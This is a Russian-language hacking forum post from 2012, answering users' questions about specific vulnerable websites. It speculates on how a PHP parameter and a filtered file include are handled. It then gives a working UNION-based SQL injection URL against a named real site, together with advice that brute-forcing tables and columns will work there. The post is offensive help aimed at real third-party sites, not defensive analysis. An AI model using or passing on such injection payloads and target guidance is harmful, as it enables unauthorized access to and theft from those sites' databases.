Тема: Ваши вопросы по уязвимостям.
Показать сообщение отдельно

  #8  
Старый 18.01.2012, 06:50
Boolean
Guest
Сообщений: n/a
Провел на форуме:
40748

Репутация: 78
По умолчанию
Цитата:
Сообщение от pirat0  
pirat0 said:
http://rzva.ru/js/menu.php?language=russian' подскажите что можно сделать, а то чет не реагирует на запросы((
Там что-то типа

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'language'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'russian'[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT .. WHERE lang=[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]AND ...."[/COLOR][COLOR="#007700"]);

[/COLOR][/COLOR
Думаю что как-то так и выглядит код.

Инъекции нет.

Цитата:
Сообщение от AnGeI  
AnGeI said:
Инклуд с фильтром:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]import_request_variables[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'GPC'[/COLOR][COLOR="#007700"]);

if ([/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'..'[/COLOR][COLOR="#007700"]) ||[/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'//'[/COLOR][COLOR="#007700"]) ||[/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'http'[/COLOR][COLOR="#007700"])

||[/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'interface'[/COLOR][COLOR="#007700"]) ) exit;

[/COLOR][/COLOR
Есть ли там где-то еще читалка, с помощью которой этот код можно получить? (код получен не мною)
Этот код просто написан по реакции скрипта на параметры, не более.

Цитата:
Сообщение от justonline  
justonline said:
http://www.sitc.ru/index.php?id=90000512
тиц 350
blind sql.
реально такое раскрутить? без information_schema то
Где ты там Blind нашел?

http://www.sitc.ru/index.php?id=90000512%27%20and%201=3%20union%20sel ect%201,2,3,4,version%28%29,6,7,8,9,10,11,12,13%20--%201

Да, версия 4, обычный брут таблиц/колонок катит.
 
Ответить с цитированием